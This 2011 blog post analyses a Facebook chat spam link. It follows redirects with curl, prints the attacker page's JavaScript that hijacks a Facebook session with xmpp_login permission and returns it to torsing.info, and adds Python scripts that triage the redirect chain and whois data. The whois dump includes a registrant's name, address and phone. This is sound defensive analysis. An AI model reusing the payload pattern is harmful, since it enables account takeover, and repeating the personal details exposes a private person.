New malware attack hits Facebook through chat!

I just got pings from three of my friends over Facebook chat, all of them containing the same message:

Hey, check out this girl, lol, she must be out of her mind for making that video!: bit.ly/eNYMXb

Well, let's see where the link takes us.

anshup@listsettle-lm: ~$ curl -I bit.ly/eNYMXb
HTTP/1.1 301 Moved
Server: nginx
Date: Sat, 19 Mar 2011 09:35:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _bit=4d8478fa-003c1-04438-d8ac8fa8;domain=.bit.ly;expires=Thu Sep 15 05:35:54 2011;path=/; HttpOnly
Cache-control: private; max-age=90
Location: http://www.torsing.info/
MIME-Version: 1.0
Content-Length: 116

As expected, the first bit.ly link is a plain 301 redirect to another site. Now let's see what the second link does.

anshup@listsettle-lm: ~$ curl -I http://www.torsing.info/
HTTP/1.1 302 Found
Date: Sat, 19 Mar 2011 09:36:04 GMT
Server: Apache
Location: http://www.torsing.info//dashboard.php
Connection: close
Content-Type: text/html

Hmm, another redirect, a 302 on the same site, this time to /dashboard.php. Not bad.

anshup@listsettle-lm: ~$ curl -I http://www.torsing.info//dashboard.php
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 09:36:11 GMT
Server: Apache
Connection: close
Content-Type: text/html

anshup@listsettle-lm: ~$ curl http://www.torsing.info//dashboard.php
<script type='text/javascript'>top.location.href = 'https://www.facebook.com/login.php?api_key=134003950005663&cancel_url=http%3A%2F%2Fwww.torsing.info%2Fmain.php&display=page&fbconnect=1&next=http%3A%2F%2Fwww.torsing.info%2Fdashboard.php&return_session=1&session_version=3&v=1.0&req_perms=xmpp_login';</script>

Now here is the bad part!
As you see in the last output, the page does nothing but bounce the browser (top.location.href) to a Facebook Connect login URL for a third-party app (api_key=134003950005663) with req_perms=xmpp_login, the extended permission that lets an app log into Facebook Chat as you, which fits how the link is spreading. With return_session=1 and next= pointing back at torsing.info/dashboard.php, the resulting session is handed straight back to the attacker's site. So it is merely a trick to get access to your Facebook account as if you had approved it (that's my assumption; I am not sure what it does and am not going to find that out right now).

What I am surprised at is that Facebook uses a non-salted/non-nonced URL for such requests.. :!
Definitely you know better, Facebook :)
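As an added example, not code from the original post, here is a small Python script that does the triage above offline: it reconstructs the redirect chain from captured `curl -I` output, pulls the JavaScript redirect target out of the final page body, and takes the Facebook login URL apart to list the app key, the requested permissions and the hosts the session is sent back to. The captured responses and page body are embedded inline as constructed copies of the output shown above; the set of "risky" permissions is my own choice and not something the page defines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed input: the three `curl -I` responses from the post (headers
# trimmed to what matters) and the body of the final page.
CAPTURED_HOPS = [
    ("bit.ly/eNYMXb", """HTTP/1.1 301 Moved
Server: nginx
Location: http://www.torsing.info/
Content-Length: 116
"""),
    ("http://www.torsing.info/", """HTTP/1.1 302 Found
Server: Apache
Location: http://www.torsing.info//dashboard.php
Connection: close
"""),
    ("http://www.torsing.info//dashboard.php", """HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
"""),
]

FINAL_BODY = ("<script type='text/javascript'>top.location.href = "
              "'https://www.facebook.com/login.php?api_key=134003950005663"
              "&cancel_url=http%3A%2F%2Fwww.torsing.info%2Fmain.php&display=page"
              "&fbconnect=1&next=http%3A%2F%2Fwww.torsing.info%2Fdashboard.php"
              "&return_session=1&session_version=3&v=1.0&req_perms=xmpp_login';</script>")

# Permissions that let a third-party app act as the user. xmpp_login is the
# one in the captured URL; the rest of the set is an assumption for illustration.
RISKY_PERMS = {"xmpp_login", "publish_stream", "offline_access"}

JS_REDIRECT = re.compile(r"top\.location\.href\s*=\s*'([^']+)'")


def parse_head(raw):
    """Parse `curl -I` style output into (status_code, {header: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return status, headers


def redirect_chain(hops):
    """Walk captured hops and return [(url, status, Location or None)]."""
    return [(url, *_status_and_location(raw)) for url, raw in hops]


def _status_and_location(raw):
    status, headers = parse_head(raw)
    return status, headers.get("location")


def js_redirect_target(body):
    """Extract the URL a `top.location.href = '...'` redirect points at."""
    match = JS_REDIRECT.search(body)
    return match.group(1) if match else None


def analyse_login_url(url):
    """Break the Facebook Connect login URL into the fields worth looking at."""
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}  # values are unquoted here
    perms = set(query.get("req_perms", "").split(",")) - {""}
    callbacks = [query[k] for k in ("next", "cancel_url") if k in query]
    return {
        "host": parts.hostname,
        "api_key": query.get("api_key"),
        "next": query.get("next"),
        "cancel_url": query.get("cancel_url"),
        "return_session": query.get("return_session"),
        "req_perms": sorted(perms),
        "risky_perms": sorted(perms & RISKY_PERMS),
        # Hosts that receive the session after login; anything that is not
        # the site you think you are logging into is the red flag.
        "callback_hosts": sorted({urlsplit(u).hostname for u in callbacks}),
    }


if __name__ == "__main__":
    for url, status, location in redirect_chain(CAPTURED_HOPS):
        print(f"{status} {url} -> {location}")
    target = js_redirect_target(FINAL_BODY)
    print("JS redirect:", target)
    for key, value in analyse_login_url(target).items():
        print(f"  {key}: {value}")
```

The point of the last step is that the login page itself is genuine Facebook; what matters is who the session goes back to (`callback_hosts`) and what the app asks for (`req_perms`), which is exactly what the raw URL above shows once it is unquoted.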

Let's see how fast it spreads and what comes out of it!

Let's see a little about the domain.

anshup@listsettle-lm: ~$ whois torsing.info
Domain ID:D36666838-LRMS
Domain Name:TORSING.INFO
Created On:05-Feb-2011 19:58:43 UTC
Last Updated On:06-Feb-2011 10:32:05 UTC
Expiration Date:05-Feb-2012 19:58:43 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR74380736
Registrant Name:Matej Kalanj
Registrant Organization:
Registrant Street1:Marohniceva 18
Registrant Street2:
Registrant Street3:
Registrant City:Rijeka
Registrant State/Province:Primorsko goranska
Registrant Postal Code:51000
Registrant Country:HR
Registrant Phone:+385.955533376
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:webmaster@sex-galerije.com
Admin ID:CR74380738
Admin Name:Matej Kalanj
Admin Organization:
Admin Street1:Marohniceva 18
Admin Street2:
Admin Street3:
Admin City:Rijeka
Admin State/Province:Primorsko goranska
Admin Postal Code:51000
Admin Country:HR
Admin Phone:+385.955533376
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:webmaster@sex-galerije.com
Billing ID:CR74380739
Billing Name:Matej Kalanj
Billing Organization:
Billing Street1:Marohniceva 18
Billing Street2:
Billing Street3:
Billing City:Rijeka
Billing State/Province:Primorsko goranska
Billing Postal Code:51000
Billing Country:HR
Billing Phone:+385.955533376
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:webmaster@sex-galerije.com
Tech ID:CR74380737
Tech Name:Matej Kalanj
Tech Organization:
Tech Street1:Marohniceva 18
Tech Street2:
Tech Street3:
Tech City:Rijeka
Tech State/Province:Primorsko goranska
Tech Postal Code:51000
Tech Country:HR
Tech Phone:+385.955533376
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:webmaster@sex-galerije.com
Name Server:MDNS1.NMSERVERS.COM
Name Server:MDNS2.NMSERVERS.COM

Hmmm, so a domain with a registrant in Croatia, created on 05-Feb-2011, only six weeks before these messages started going around, and with a contact address at a porn gallery site. Interesting.
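As an added example (not from the original post), the same check in Python: parse a whois record like the one above into fields, compute the domain's age at the time the link was observed, and collect the contact details that would be useful as pivots. The whois text is a constructed, abbreviated copy of the record shown above, the observation time is taken from the Date: header of the curl output, and the 90-day "young domain" threshold is my own assumption.

```python
from datetime import datetime, timezone

# Constructed input: an abbreviated copy of the whois record shown above
# (the repeated Admin/Billing/Tech blocks collapsed to their email lines).
WHOIS_TEXT = """Domain ID:D36666838-LRMS
Domain Name:TORSING.INFO
Created On:05-Feb-2011 19:58:43 UTC
Last Updated On:06-Feb-2011 10:32:05 UTC
Expiration Date:05-Feb-2012 19:58:43 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Registrant Name:Matej Kalanj
Registrant Organization:
Registrant Country:HR
Registrant Email:webmaster@sex-galerije.com
Admin Email:webmaster@sex-galerije.com
Billing Email:webmaster@sex-galerije.com
Tech Email:webmaster@sex-galerije.com
Name Server:MDNS1.NMSERVERS.COM
Name Server:MDNS2.NMSERVERS.COM
"""

# When the link was observed: the Date: header from the curl output above.
OBSERVED_AT = datetime(2011, 3, 19, 9, 36, 4, tzinfo=timezone.utc)

# Assumed threshold: domains younger than this at first sighting get flagged.
YOUNG_DOMAIN_DAYS = 90


def parse_whois(text):
    """Turn 'Key:Value' lines into {key: [values]}; empty values are dropped."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if value:
            fields.setdefault(key, []).append(value)
    return fields


def parse_whois_date(value):
    """Parse the 'DD-Mon-YYYY HH:MM:SS UTC' format used in this record."""
    naive = datetime.strptime(value, "%d-%b-%Y %H:%M:%S %Z")
    return naive.replace(tzinfo=timezone.utc)


def triage(fields, observed_at, young_days=YOUNG_DOMAIN_DAYS):
    """Summarise the registration facts an analyst would pivot on."""
    created = parse_whois_date(fields["Created On"][0])
    expires = parse_whois_date(fields["Expiration Date"][0])
    age_days = (observed_at - created).days
    # Every *Email field, de-duplicated: here all four roles share one address.
    emails = sorted({v for k, vs in fields.items() if k.endswith("Email") for v in vs})
    return {
        "domain": fields["Domain Name"][0].lower(),
        "registrar": fields.get("Sponsoring Registrar", [None])[0],
        "created": created.isoformat(),
        "age_days": age_days,
        "young_domain": age_days < young_days,
        # One-year registrations are the minimum term, common for throwaway domains.
        "registration_term_days": (expires - created).days,
        "country": fields.get("Registrant Country", [None])[0],
        "contact_emails": emails,
        "contact_domains": sorted({e.split("@", 1)[1].lower() for e in emails}),
        "name_servers": [ns.lower() for ns in fields.get("Name Server", [])],
    }


if __name__ == "__main__":
    for key, value in triage(parse_whois(WHOIS_TEXT), OBSERVED_AT).items():
        print(f"{key}: {value}")
```

Run against the record above this reports an age of 41 days at the time of the chat messages, a one-year registration, and a single contact domain (sex-galerije.com) that can be searched for other domains registered by the same person.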

Written on March 19, 2011